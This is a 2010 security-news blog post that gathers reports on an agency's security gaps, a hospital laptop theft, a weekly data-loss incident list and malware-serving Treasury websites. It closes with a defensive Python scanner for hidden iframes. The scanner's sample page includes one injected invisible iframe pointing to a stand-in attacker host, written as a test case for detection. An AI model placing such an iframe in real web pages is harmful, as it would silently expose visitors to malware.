Tuesday, 4 May 2010

Federal mortgage watchdog agency struggles with its information security

By William Jackson
GCN.com
May 03, 2010

The Federal Housing Finance Agency, a fledgling organization created in 2008 to oversee federal mortgage activities, has not fully implemented an information security program, resulting in weaknesses in its information technology security, according to the Government Accountability Office.

"FHFA has made important progress in developing and documenting its policies and procedures for the agency's information security program," GAO concluded in its report. "However, policies, procedures, plans, and technical standards related to information security did not always reflect the current agency operating environment; and FHFA did not always effectively monitor its systems."

GAO found that FHFA did not always maintain authorization records for network and system access, and did not enforce least-privilege policies for system and application users. It also did not have adequate physical security and environmental safety controls for facilities housing IT resources.

"Until the agency strengthens its logical access and physical access controls and fully implements an information security program that includes policies and procedures reflecting the current agency environment, increased risk exists that sensitive information and resources will not be sufficiently protected from inadvertent or deliberate misuse, improper disclosure, or destruction," GAO concluded.

[...]

Laptop stolen from mammo suite with data on 5,400 patients

By Editorial Staff
HealthImaging.com
May 2, 2010

The Medical Center in Bowling Green, Ky., is currently notifying 5,418 patients of a breach of personal protected health information, resulting from the theft of computer equipment from its mammography suite containing information on patients who underwent bone density testing between 1997 and 2009.

At this point the provider said it had no reason to believe the device was stolen for the information on it or that any personal information has been released or used.

On April 1, the Medical Center said it discovered that the laptop had been stolen from its mammography suite. Upon learning of the theft, the facility launched an investigation of the incident, and the theft has been reported to the Bowling Green Police Department.

The facility has since discovered that the data on the device included each patient's name, date of birth, address, medical record number and physician name. Some patients' records also included information such as Social Security numbers, weight, height and age at menopause. The data on the hard drive was not encrypted; however, the hard drive was kept in a locked, non-public, private area, according to the hospital.

[...]


data loss weekly summary

Open Security Foundation - DataLossDB Weekly Summary Week of Sunday, April 25, 2010

11 Incidents Added.

========================================================================

DataLossDB is a research project aimed at documenting known and reported data loss incidents world-wide. The Open Security Foundation asks for contributions of new incidents and new data for existing incidents. For any questions about the project or the data contained within this email or the website (http://www.datalossdb.org), please contact us at curators@datalossdb.org.

========================================================================

DataLossDB News/Updates

No news this week!


========================================================================

Incidents Added


Reported Date: 2010-04-29
Summary: Stolen computers expose 20,000 patients' names, dates of birth and Social Security numbers
Organizations: St. Jude Heritage Medical Center
http://datalossdb.org/incidents/2759
---------------------

Reported Date: 2010-04-28
Summary: Payroll services company erroneously merges two organizations' data, exposing names, Social Security numbers, and benefits information of employees
Organizations: Paychex
http://datalossdb.org/incidents/2757
---------------------

Reported Date: 2010-04-28
Summary: Stolen hard drive exposes 5,418 patients' names, addresses, dates of birth, and medical numbers
Organizations: The Medical Center at Bowling Green
http://datalossdb.org/incidents/2758
---------------------

Reported Date: 2010-04-28
Summary: Employee accidentally emails students' names, addresses and Social Security numbers
Organizations: Montana Tech of The University of Montana
http://datalossdb.org/incidents/2756
---------------------

Reported Date: 2010-04-26
Summary: Email attachment exposes 33 students' email including names, GPAs and student ID numbers
Organizations: University of Wisconsin - Milwaukee
http://datalossdb.org/incidents/2750
---------------------

Reported Date: 2010-04-26
Summary: Employee steals at least 70 adoptive and foster parents' personal details
Organizations: Texas Child Protective Services Division
http://datalossdb.org/incidents/2751
---------------------

Reported Date: 2010-04-26
Summary: Hundreds of patients' medical files dumped outside closed office, exposing names, addresses, Social Security numbers
Organizations: DRC Physical Therapy Plus
http://datalossdb.org/incidents/2749
---------------------

Reported Date: 2010-04-23
Summary: Data backup inadvertently sent to an unauthorized storage source
Organizations: ESB Financial
http://datalossdb.org/incidents/2754
---------------------

Reported Date: 2008-12-08
Summary: Lost computer contained personal information
Organizations: YMCA of Metropolitan Los Angeles
http://datalossdb.org/incidents/2752
---------------------

Reported Date: 2008-05-02
Summary: Problem with data processing caused mail documents to go to wrong customers
Organizations: Sterling Jewelers Inc.
http://datalossdb.org/incidents/2753
---------------------

Reported Date: 2008-02-12
Summary: Individual found to have copies of confidential documents including personal information.
Organizations: Marlborough Hospital
http://datalossdb.org/incidents/2755
---------------------


========================================================================

Blotter Posts


Added: 2010-05-01
Title: Palin hacker found guilty on two counts http://feedproxy.google.com/~r/SCMagazineHome/~3/wKD2hi43Ugw/
---------------------

Added: 2010-04-29
Title: Report: Palin e-mail snooping jury deadlocked http://www.computerworld.com/s/article/9176146/Report_Palin_e_mail_snooping_jury_deadlocked?source=rss_networking
---------------------

Added: 2010-04-29
Title: Medicare scam makes the rounds statewide http://blog.dispatch.com/wallet/2010/04/medicare_scam_makes_the_rounds.shtml
---------------------

Added: 2010-04-29
Title: How Data Laws Slap Insecure Companies http://www.forbes.com/2010/04/27/breach-disclosure-data-technology-security-laws.html?feed=rss_home
---------------------

Added: 2010-04-29
Title: Washington driver license changing to protect IDs http://seattletimes.nwsource.com/html/localnews/2011720527_apwadriverlicensechange.html?syndication=rss
---------------------

Added: 2010-04-27
Title: US court sentences Indian to 81 months in prison http://timesofindia.indiatimes.com/World-Indians-Abroad/US-court-sentences-Indian-to-81-months-in-prison/articleshow/5862167.cms
---------------------

Added: 2010-04-27
Title: Vets use settlement millions from identity-theft suit against VA to help other vets http://feeds.nydailynews.com/~r/nydnrss/news/~3/3ktvti24xvc/2010-04-27_vets_use_settlement_millions_to_help_vets.html
---------------------

Added: 2010-04-27
Title: Tidal wave of ID theft fraud sweeps the UK, survey reveals http://www.computerweekly.com/Articles/2010/04/26/241034/tidal-wave-of-id-theft-fraud-sweeps-the-uk-survey-reveals.htm
---------------------

Added: 2010-04-27
Title: How Well Do Hospitals Protect Your Data? Abysmally
http://feeds.informationweek.com/click.phdo?i=aaa3646e7ef5598a22fdf42cc604f880
---------------------


_______________________________________________
Dataloss Mailing List (dataloss@datalossdb.org)


Hacked US Treasury websites serve visitors malware

By Dan Goodin in San Francisco
The Register
3rd May 2010

Updated - Websites operated by the US Treasury Department are redirecting visitors to websites that attempt to install malware on their PCs, a security researcher warned on Monday.

The infection buries an invisible iframe in bep.treas.gov, moneyfactory.gov, and bep.gov that invokes malicious scripts from grepad.com, Roger Thompson, chief research officer of AVG Technologies, told The Register. The code was discovered late Sunday night and was still active at the time of writing, about 12 hours later.

To cover their tracks, the miscreants behind the compromise tailored it so that it attacks only IP addresses that have not already visited the Treasury websites. That makes it harder for white-hat hackers and law enforcement agents to track the exploit. Indeed, Thompson initially reported that the problem had been fixed, until he discovered the sites were merely skipping over laboratory PCs that had already encountered the attack.

The attack is most likely related to mass infections that two weeks ago hit hundreds of sites hosted by Network Solutions and GoDaddy, said Dean De Beer, founder and CTO of security consultancy Zero(day) Solutions.

[...]
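The injection described above is the classic hidden-iframe pattern: a zero-sized or display:none frame pulling content from a domain the page does not belong to. The following scanner, an added example and not code from The Register or AVG, flags iframes in fetched HTML that are both hidden and off-site; the sample page and the host evil.example are constructed. Because the compromise served the iframe only to first-time IP addresses, a scan from an address that has already visited the site may see a clean page, so run such checks from a fresh address and compare.

```python
"""Flag hidden iframes whose src points off-site (added example, not the article's code)."""
from html.parser import HTMLParser
from urllib.parse import urlparse

HIDDEN_STYLE_MARKERS = ("display:none", "visibility:hidden")


def _is_hidden(attrs):
    """True when the iframe is zero-sized or styled invisible."""
    style = attrs.get("style", "").replace(" ", "").lower()
    if any(marker in style for marker in HIDDEN_STYLE_MARKERS):
        return True
    for dim in ("width", "height"):
        if attrs.get(dim, "").strip().rstrip("px") == "0":
            return True
    return False


class IframeCollector(HTMLParser):
    """Collects the attribute dict of every <iframe> start tag."""

    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag == "iframe":
            self.iframes.append({name: (value or "") for name, value in attrs})


def find_suspicious_iframes(html, page_url):
    """Return src values of iframes that are hidden AND load from another host.

    A relative src is treated as on-site. Host comparison is exact, so a frame
    from a sibling subdomain is reported too; tune that for your own sites."""
    page_host = urlparse(page_url).hostname or ""
    parser = IframeCollector()
    parser.feed(html)
    hits = []
    for attrs in parser.iframes:
        src = attrs.get("src", "")
        host = urlparse(src).hostname or page_host
        if host != page_host and _is_hidden(attrs):
            hits.append(src)
    return hits


# Constructed sample: one legitimate visible frame, one injected hidden frame.
SAMPLE_HTML = """<html><body>
<iframe src="/embed/video" width="400" height="300"></iframe>
<iframe src="http://evil.example/in.php" width="0" height="0" style="display: none"></iframe>
</body></html>"""

if __name__ == "__main__":
    print(find_suspicious_iframes(SAMPLE_HTML, "http://www.bep.treas.gov/"))
```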
